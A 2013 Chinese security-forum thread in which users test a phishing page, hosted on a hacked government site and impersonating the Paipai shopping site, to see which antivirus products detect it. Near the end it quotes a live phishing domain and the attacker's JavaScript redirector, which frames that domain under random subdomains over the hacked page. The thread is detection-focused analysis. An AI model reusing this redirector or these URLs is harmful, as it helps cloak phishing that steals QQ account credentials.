钓鱼网站，过卡巴

Autonomous

转帖于：http://bbs.pcbeta.com/viewthread-1308295-1-1.html
强烈建议在虚拟机环境下进行测试：

钓鱼网站：

1. hxxp://www.ncgxga.gov.cn/crj/ir.asp?567&yrolpe/0.06

复制代码

声明：这个网站可能会损害您的计算机，对此造成的一切后果由测试者本人承担！
测试前请关闭你的QQ，这个网站可以自动调用QQ快速登陆插件，从而获取您的QQ密码：



随便输入QQ账号密码，卡巴密码管理器提示：

This could be phishing attack.

“可能是钓鱼网站”，其实就是。

以下是正牌拍拍网。

Autonomous

即使将卡巴斯基网页反病毒和反钓鱼启发开至最高都没有报毒。

清茗微漾

pure厉害...

卡不卡卡

沙盒中运行的Chrome点击打开，KIS 12未报，金山卫士可能因为沙盒的缘故或别的原因同样没有反应。因为处在沙盒环境下Chrome无法调用QQ快速登录，随便输了帐号与密码均提示错误，貌似做的还挺专业，表示凭借个人能力基本无法识别，平时都不接触拍拍，也不用。猎豹提示安全，不知道是不是因为在沙盘中无法加驱的缘故。

Autonomous

卡不卡卡 发表于 2013-3-28 12:40
沙盒中运行的Chrome点击打开，KIS 12未报，金山卫士可能因为沙盒的缘故或别的原因同样没有反应。因为处在 ...

随便输入密码提示错误。
这一点做的很专业，但是网址里面是gov，这个很容易露馅的吧

卡不卡卡

Autonomous 发表于 2013-3-28 12:49
随便输入密码提示错误。
这一点做的很专业，但是网址里面是gov，这个很容易露馅的吧

嗯，经常接触的人可能会有所警惕，像我这样基本没接触过拍拍的，如果条件齐备估计会被成功钓鱼。

heyuhui

管家kill

哀酱俏佳人

heyuhui 发表于 2013-3-28 12:58
管家kill

怎么你的网址和楼主的不一样？

蓝核

哀酱俏佳人 发表于 2013-3-28 13:10
怎么你的网址和楼主的不一样？

简单的说，就是用JS一层皮覆盖在了被黑的网站上了 管家报的是对的

不过等萌萌和阿狸继续围观~

蓝核

钓鱼

1. hdgsad.net

复制代码

转向这个

1. var urls="http://hdgsad.net";urls=urls.replace("http://","");var p1=Math.random()*100+1;var p2=Math.random()*100+1;var str="4aeb195cd69ed93520b9b4129636264e0cdc015358d1bbce297de3c304a9fefc3b483181872a5c6bf77e69b7c4be312f7ae0ccfe2d3b13867cd894da";var strrnd=str.substring(p1,p1+2)+str.substring(p2,p2+3);var url;x=location.search.substring(1).split('&');if(x!=null){url="http://"+strrnd+"."+urls+"/"+x[1];}else{url="http://"+strrnd+"."+urls;}var s="<frameset frameborder='NO' border='0' framespacing='0'><frame src='"+url+"' noresize='noresize' frameborder='NO' name='topFrame'  marginwidth='0' marginheight='0' target='main'/>";document.write (s);

复制代码

ps，请您将恶意网址地址修改为HXXP，去掉url标签~辛苦了~